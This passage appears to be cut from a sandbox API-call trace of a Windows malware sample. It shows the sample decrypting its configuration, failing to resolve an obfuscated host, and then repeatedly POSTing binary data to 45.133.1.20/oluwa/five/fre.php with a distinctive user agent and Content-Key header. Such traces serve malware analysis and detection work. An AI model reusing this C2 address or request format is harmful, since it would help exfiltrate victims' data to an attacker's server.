close\r\n\r\n") returned 242 [0300.965] GetProcessHeap () returned 0x6a0000 [0300.966] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0300.966] GetProcessHeap () returned 0x6a0000 [0300.966] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0300.966] send (s=0xb60, buf=0x6bd460*, len=242, flags=0) returned 242 [0300.967] send (s=0xb60, buf=0x6bb998*, len=159, flags=0) returned 159 [0300.967] GetProcessHeap () returned 0x6a0000 [0300.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0300.967] recv (in: s=0xb60, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0301.042] GetProcessHeap () returned 0x6a0000 [0301.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0301.043] GetProcessHeap () returned 0x6a0000 [0301.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0301.044] GetProcessHeap () returned 0x6a0000 [0301.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dab88 | out: hHeap=0x6a0000) returned 1 [0301.045] GetProcessHeap () returned 0x6a0000 [0301.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0301.045] closesocket (s=0xb60) returned 0 [0301.046] GetProcessHeap () returned 0x6a0000 [0301.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa90 | out: hHeap=0x6a0000) returned 1 [0301.046] GetProcessHeap () returned 0x6a0000 [0301.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0301.047] GetProcessHeap () returned 0x6a0000 [0301.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0301.047] GetProcessHeap () returned 0x6a0000 [0301.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0301.048] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1898) returned 0xb60 [0301.051] Sleep (dwMilliseconds=0xea60) [0301.052] GetProcessHeap () returned 0x6a0000 [0301.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0301.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.054] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0301.062] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.062] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0301.090] GetProcessHeap () returned 0x6a0000 [0301.090] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0301.143] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.143] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad520) returned 1 [0301.144] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.201] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0301.202] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.202] CryptSetKeyParam (hKey=0x6ad520, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0301.202] GetProcessHeap () returned 0x6a0000 [0301.203] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0301.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.205] CryptDecrypt (in: hKey=0x6ad520, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0301.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.206] CryptDestroyKey (hKey=0x6ad520) returned 1 [0301.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.207] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0301.207] GetProcessHeap () returned 0x6a0000 [0301.207] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0301.208] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.209] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0301.210] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.212] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0301.213] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.213] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0301.214] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.215] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0301.215] GetProcessHeap () returned 0x6a0000 [0301.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0301.215] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0301.215] GetProcessHeap () returned 0x6a0000 [0301.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0301.216] GetProcessHeap () returned 0x6a0000 [0301.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0301.216] GetProcessHeap () returned 0x6a0000 [0301.216] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0301.216] GetProcessHeap () returned 0x6a0000 [0301.216] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0301.217] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.218] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0301.228] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.228] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0301.240] GetProcessHeap () returned 0x6a0000 [0301.240] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0301.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.290] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0301.291] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.291] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0301.292] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.292] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0301.292] GetProcessHeap () returned 0x6a0000 [0301.293] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0301.293] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.294] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0301.294] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.295] CryptDestroyKey (hKey=0x6ad020) returned 1 [0301.295] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.296] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0301.296] GetProcessHeap () returned 0x6a0000 [0301.296] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0301.296] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.297] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0301.297] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.298] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0301.301] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.301] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0301.302] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.302] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0301.302] GetProcessHeap () returned 0x6a0000 [0301.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0301.302] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0301.302] GetProcessHeap () returned 0x6a0000 [0301.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa50 [0301.302] socket (af=2, type=1, protocol=6) returned 0xb64 [0301.302] connect (s=0xb64, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0301.331] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0301.331] GetProcessHeap () returned 0x6a0000 [0301.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0301.331] GetProcessHeap () returned 0x6a0000 [0301.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6e0f50 [0301.331] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0301.333] wvsprintfA (in: param_1=0x6e0f50, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0301.333] GetProcessHeap () returned 0x6a0000 [0301.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6db248 [0301.333] GetProcessHeap () returned 0x6a0000 [0301.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0301.334] GetProcessHeap () returned 0x6a0000 [0301.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4760 [0301.334] GetProcessHeap () returned 0x6a0000 [0301.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6e0f50 [0301.335] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0301.335] wvsprintfA (in: param_1=0x6e0f50, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0301.335] GetProcessHeap () returned 0x6a0000 [0301.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0301.335] GetProcessHeap () returned 0x6a0000 [0301.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e0f50 | out: hHeap=0x6a0000) returned 1 [0301.336] send (s=0xb64, buf=0x6bd460*, len=242, flags=0) returned 242 [0301.337] send (s=0xb64, buf=0x6bb998*, len=159, flags=0) returned 159 [0301.337] GetProcessHeap () returned 0x6a0000 [0301.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0301.337] recv (in: s=0xb64, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0301.410] GetProcessHeap () returned 0x6a0000 [0301.411] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0301.411] GetProcessHeap () returned 0x6a0000 [0301.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0301.412] GetProcessHeap () returned 0x6a0000 [0301.412] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db248 | out: hHeap=0x6a0000) returned 1 [0301.413] GetProcessHeap () returned 0x6a0000 [0301.413] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0301.414] closesocket (s=0xb64) returned 0 [0301.414] GetProcessHeap () returned 0x6a0000 [0301.414] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa50 | out: hHeap=0x6a0000) returned 1 [0301.414] GetProcessHeap () returned 0x6a0000 [0301.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0301.415] GetProcessHeap () returned 0x6a0000 [0301.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0301.415] GetProcessHeap () returned 0x6a0000 [0301.415] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0301.416] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6720, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x189c) returned 0xb64 [0301.418] Sleep (dwMilliseconds=0xea60) [0301.419] GetProcessHeap () returned 0x6a0000 [0301.419] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0301.420] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.422] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0301.429] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.430] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0301.440] GetProcessHeap () returned 0x6a0000 [0301.440] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6df660 [0301.440] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.441] CryptImportKey (in: hProv=0x6bef48, pbData=0x6df660, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0301.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.441] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0301.442] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.442] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0301.442] GetProcessHeap () returned 0x6a0000 [0301.443] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df660 | out: hHeap=0x6a0000) returned 1 [0301.443] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.443] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0301.444] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.444] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0301.445] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.445] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0301.445] GetProcessHeap () returned 0x6a0000 [0301.445] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0301.445] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.446] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0301.446] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.446] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0301.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.447] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0301.448] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.448] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0301.448] GetProcessHeap () returned 0x6a0000 [0301.448] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0301.448] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0301.448] GetProcessHeap () returned 0x6a0000 [0301.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0301.449] GetProcessHeap () returned 0x6a0000 [0301.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0301.449] GetProcessHeap () returned 0x6a0000 [0301.449] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0301.449] GetProcessHeap () returned 0x6a0000 [0301.449] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0301.450] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.450] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0301.454] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.455] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf278) returned 1 [0301.460] GetProcessHeap () returned 0x6a0000 [0301.460] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6db6b8 [0301.461] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.461] CryptImportKey (in: hProv=0x6bf278, pbData=0x6db6b8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0301.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.462] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0301.462] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.463] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0301.463] GetProcessHeap () returned 0x6a0000 [0301.463] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6db6b8 | out: hHeap=0x6a0000) returned 1 [0301.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.464] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0301.464] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.465] CryptDestroyKey (hKey=0x6ad020) returned 1 [0301.465] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0301.465] CryptReleaseContext (hProv=0x6bf278, dwFlags=0x0) returned 1 [0301.465] GetProcessHeap () returned 0x6a0000 [0301.465] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0301.466] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.466] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0301.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.467] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0301.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.468] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0301.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0301.469] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0301.469] GetProcessHeap () returned 0x6a0000 [0301.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0301.469] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0301.469] GetProcessHeap () returned 0x6a0000 [0301.469] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab40 [0301.469] socket (af=2, type=1, protocol=6) returned 0xb68 [0301.469] connect (s=0xb68, name=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0301.663] FreeAddrInfoW (pAddrInfo=0x6b3670*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6bea90*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0301.663] GetProcessHeap () returned 0x6a0000 [0301.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0301.663] GetProcessHeap () returned 0x6a0000 [0301.663] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6df748 [0301.664] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0301.665] wvsprintfA (in: param_1=0x6df748, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0301.665] GetProcessHeap () returned 0x6a0000 [0301.665] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6da648 [0301.665] GetProcessHeap () returned 0x6a0000 [0301.666] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0301.666] GetProcessHeap () returned 0x6a0000 [0301.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0301.666] GetProcessHeap () returned 0x6a0000 [0301.666] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6df748 [0301.667] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0301.670] wvsprintfA (in: param_1=0x6df748, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0301.670] GetProcessHeap () returned 0x6a0000 [0301.670] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0301.670] GetProcessHeap () returned 0x6a0000 [0301.671] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6df748 | out: hHeap=0x6a0000) returned 1 [0301.671] send (s=0xb68, buf=0x6bd460*, len=242, flags=0) returned 242 [0301.672] send (s=0xb68, buf=0x6bb998*, len=159, flags=0) returned 159 [0301.672] GetProcessHeap () returned 0x6a0000 [0301.672] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6720 [0301.672] recv (in: s=0xb68, buf=0x6c6720, len=4048, flags=0 | out: buf=0x6c6720*) returned 204 [0301.738] GetProcessHeap () returned 0x6a0000 [0301.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0301.739] GetProcessHeap () returned 0x6a0000 [0301.739] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 